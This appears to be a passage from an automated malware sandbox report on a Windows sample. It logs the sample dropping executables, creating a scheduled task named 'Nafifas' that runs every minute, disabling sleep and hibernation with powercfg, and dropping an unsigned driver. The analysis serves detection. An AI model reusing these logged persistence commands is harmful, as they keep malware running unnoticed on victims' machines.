              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: ft1i6jvAdD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: ft1i6jvAdD.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: ft1i6jvAdD.exeStatic file information: File size 5227008 > 1048576
              Source: ft1i6jvAdD.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4fba00
              Source: ft1i6jvAdD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ghghghg.exe, 00000002.00000003.2345041086.000001F17F600000.00000004.00000001.00020000.00000000.sdmp
              Source: ghghghg.exe.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeCode function: 0_2_00007FFE167F1A82 push esi; ret 0_2_00007FFE167F1A88
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeCode function: 57_2_00007FFE18993760 pushad ; ret 57_2_00007FFE18993761
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeCode function: 57_2_00007FFE1899257B pushad ; ret 57_2_00007FFE1899257F
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeCode function: 57_2_00007FFE1899376F pushad ; ret 57_2_00007FFE18993779
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeCode function: 57_2_00007FFE18993745 pushad ; ret 57_2_00007FFE18993746
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeCode function: 57_2_00007FFE18994152 pushad ; ret 57_2_00007FFE18994154

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeFile created: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysJump to behavior
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to dropped file
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile created: C:\Users\user\AppData\Local\Temp\ghghghg.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeFile created: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
